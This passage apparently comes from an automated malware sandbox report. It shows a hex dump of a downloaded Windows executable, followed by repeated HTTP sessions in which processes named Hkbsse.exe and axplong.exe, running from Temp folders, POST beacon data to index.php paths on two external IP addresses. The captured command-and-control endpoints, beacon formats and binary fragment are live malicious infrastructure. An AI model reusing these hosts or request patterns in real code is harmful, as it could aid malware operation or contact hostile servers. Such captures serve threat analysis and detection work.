00 00 f0 00 02 01 0b 02 08 00 00 5c 23 00 00 3c 14 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 37 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 23 00 ac 3a 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd\#< @ 7`@@ #: H.text[# \# `.rsrc:#<^#@@HX"TN-"~PtfL^[1wuBZF!-(E!l\|IIf9HOO_9XBCRn\|kh^rly~`ZB(e_pFjgZ4phHy7P6Q)92y:nFbzW\cl]1w-(6i( Urg@N=q]'d plW!r_Dxq_-<FsQ#ixL+,b"W6h\d0`\>1wlRln(}*hc}
Sep 27, 2024 04:21:46.036263943 CEST	1236	IN	Data Raw: 3a dd f7 d6 61 0f fd cb c7 62 a2 12 39 49 85 2c 06 ef 2e 1d 91 f2 c8 50 d2 cd 82 73 7a 6f 87 7c 6a ed 34 4a 85 52 af dd bd 03 9f 8e 4a aa ae 19 22 e7 ba fe bf c9 eb 46 15 a6 04 92 8c 8a 50 58 da 26 a6 4a 14 3b a6 b2 3f 50 5e 8d 53 39 05 28 1f 68 Data Ascii: :ab9I,.Pszo\|j4JRJ"FPX&J;?P^S9(hP4NQ2G$cAoj]s#9RhI%c"+$cjPL5X<r-_sZ_IILg<vf{KUs,j>P[8-9X$uH4$XM9(w
Sep 27, 2024 04:21:46.036284924 CEST	1236	IN	Data Raw: 00 00 01 a2 14 14 16 17 28 4b 00 00 0a 00 2a 1e 02 28 37 00 00 0a 2a 76 00 72 da 0a 00 70 28 85 00 00 0a 8c 14 00 00 01 03 28 86 00 00 0a 28 87 00 00 0a 00 2a 4e 02 28 37 00 00 0a 00 02 73 88 00 00 0a 7d 27 00 00 04 2a ee 00 02 03 7d 24 00 00 04 Data Ascii: (K(7vrp(((N(7s}'}$}%}&}({(rp{$(oO.sa&{-+"}-&{.+"}.&{/+"}/(7(f(h(j&{0
Sep 27, 2024 04:21:46.036304951 CEST	1236	IN	Data Raw: 03 2c 0c 02 03 7b 8c 00 00 04 7d 8c 00 00 04 2a 62 02 28 37 00 00 0a 00 02 73 37 00 00 0a 28 38 00 00 0a 7d 8e 00 00 04 2a 82 00 02 03 28 38 00 00 0a 20 f7 00 00 00 20 d3 00 00 00 1f 3b 28 0b 01 00 0a 28 4e 01 00 06 00 2a 26 02 7b c6 00 00 04 2b Data Ascii: ,{}b(7s7(8}(8 ;((N&{+6(8}N(7s}&{+6(8}6(T(sV}(W sX(Yr,poZ0O @%m(
Sep 27, 2024 04:21:46.036317110 CEST	1236	IN	Data Raw: 00 04 6f 49 00 00 0a 16 6f 4a 00 00 0a 6f 4c 00 00 0a 16 6f 4d 00 00 0a 00 02 28 34 00 00 06 14 72 03 01 00 70 16 8d 06 00 00 01 14 14 14 28 48 00 00 0a 14 72 2d 01 00 70 17 8d 06 00 00 01 25 16 17 8c 55 00 00 01 a2 14 14 16 17 28 4b 00 00 0a 00 Data Ascii: oIoJoLoM(4rp(Hr-p%U(K}{oN(4r?p%V(O&}0{(ErWp(FoG&{*,(={oIoJoLoPo
Sep 27, 2024 04:21:46.036329985 CEST	1236	IN	Data Raw: 0c 72 60 07 00 70 13 0d 12 29 15 28 5e 00 00 0a 38 46 01 00 00 00 02 7b 0c 00 00 04 6f 49 00 00 0a 16 6f 4a 00 00 0a 6f 4c 00 00 0a 16 6f 50 00 00 0a 11 27 1f 33 d6 6f 51 00 00 0a 28 52 00 00 0a 13 0b 11 0b 72 60 07 00 70 16 28 5f 00 00 0a 16 fe Data Ascii: r`p)(^8F{oIoJoLoP'3oQ(Rr`p(_rdp(_`rfp(_`33,r`pr`p)(^8r`p$o`%%oa%ob%oa)(^4{oIoJoLoP
Sep 27, 2024 04:21:46.036341906 CEST	1236	IN	Data Raw: 0a 00 00 1b 11 3b 2b 0f 12 3a 28 65 00 00 0a 16 fe 01 73 66 00 00 0a 13 3b 12 3b 28 67 00 00 0a 13 43 11 43 39 c5 00 00 00 02 7b 0d 00 00 04 6f 49 00 00 0a 16 6f 4a 00 00 0a 6f 68 00 00 0a 13 44 02 7b 0d 00 00 04 6f 49 00 00 0a 16 6f 4a 00 00 0a Data Ascii: ;+:(esf;;(gCC9{oIoJohD{oIoJoLD{oIoJoLoiojD'VokD)okDokDokDVokDVokDrdpokDrdpok
Sep 27, 2024 04:21:46.036354065 CEST	1236	IN	Data Raw: 16 6f 4a 00 00 0a 6f 4c 00 00 0a 16 6f 50 00 00 0a 11 30 6f 51 00 00 0a 16 28 63 00 00 0a 13 32 11 32 2c 0b 12 28 11 27 28 5e 00 00 0a 2b 12 00 00 00 11 30 17 d6 13 30 11 30 1f 63 3e 7c ff ff ff 00 02 7b 0c 00 00 04 6f 49 00 00 0a 16 6f 4a 00 00 Data Ascii: oJoLoP0oQ(c22,('(^+000c>\|{oIoJoLoP'oQ(8(]33,r`pr`p)(^8E{oIoJoLoP'oQ(Rr`p(_rdp(_`rfp(_`4
Sep 27, 2024 04:21:46.036369085 CEST	1236	IN	Data Raw: 6f 4a 00 00 0a 6f 4c 00 00 0a 16 6f 50 00 00 0a 11 27 18 d6 6f 51 00 00 0a 28 38 00 00 0a 28 5d 00 00 0a 16 fe 01 13 42 11 42 39 3c 01 00 00 02 7b 0c 00 00 04 6f 49 00 00 0a 16 6f 4a 00 00 0a 6f 4c 00 00 0a 16 6f 50 00 00 0a 11 27 18 d6 6f 51 00 Data Ascii: oJoLoP'oQ(8(]BB9<{oIoJoLoP'oQr`p(lCC9);;(d-<<+;(esf<<(gDD9{oIoJohE{oIoJoLE{oIoJoLoioj
Sep 27, 2024 04:21:46.036380053 CEST	1236	IN	Data Raw: 11 04 20 96 00 00 00 6f 73 00 00 0a 00 06 6f 74 00 00 0a 11 04 6f 75 00 00 0a 26 73 70 00 00 0a 13 09 11 09 72 76 08 00 70 6f 71 00 00 0a 00 11 09 72 80 08 00 70 6f 72 00 00 0a 00 11 09 20 96 00 00 00 6f 73 00 00 0a 00 06 6f 74 00 00 0a 11 09 6f Data Ascii: osotou&sprvpoqrpor osotou&{rp(Hr$p%%U%%(O&-+(8b((vtb0e{(ErWp(FoG&{oI
Sep 27, 2024 04:21:46.036936998 CEST	1236	IN	Data Raw: 2b 50 00 08 17 d6 0c 17 0b 02 7b 1b 00 00 04 14 72 02 07 00 70 17 8d 06 00 00 01 25 16 12 01 28 56 00 00 0a a2 14 14 28 5c 00 00 0a 00 02 7b 1c 00 00 04 14 72 02 07 00 70 17 8d 06 00 00 01 25 16 12 02 28 56 00 00 0a a2 14 14 28 5c 00 00 0a 00 00 Data Ascii: +P{rp%(V(\{rp%(V(\oZsxoyrp{rp(H(zrp(z{rp(H(zr$p(z(Ro{o\|(w}{oI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49776	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:45.859035015 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:46.571154118 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:46.574659109 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:46.811865091 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49778	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:46.961760044 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:47.718556881 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:47.719949961 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:47.960158110 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49781	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:48.382457018 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:49.098851919 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:49.100006104 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:49.331341028 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49784	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:49.454050064 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:50.160211086 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:50.167229891 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:50.404634953 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49785	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:49.933557987 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 33 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000356001&unit=246122658369
Sep 27, 2024 04:21:50.677392006 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49787	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:50.947454929 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:51.539670944 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:51.543601036 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:51.565155983 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:51.806015968 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49788	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:51.134881020 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:51.820317030 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:51.872001886 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 04:21:52.094053030 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49789	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:52.056005001 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:52.758356094 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:52.794390917 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:53.030395031 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49790	185.215.113.16	80	5632	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:52.381922007 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:53.036693096 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:53.089853048 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 04:21:53.311146975 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	49792	185.215.113.26	80	7040	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:21:53.654206991 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 04:21:54.339937925 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 04:21:54.471024990 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Sep 27, 2024 04:21:54.705004930 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 02:21:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
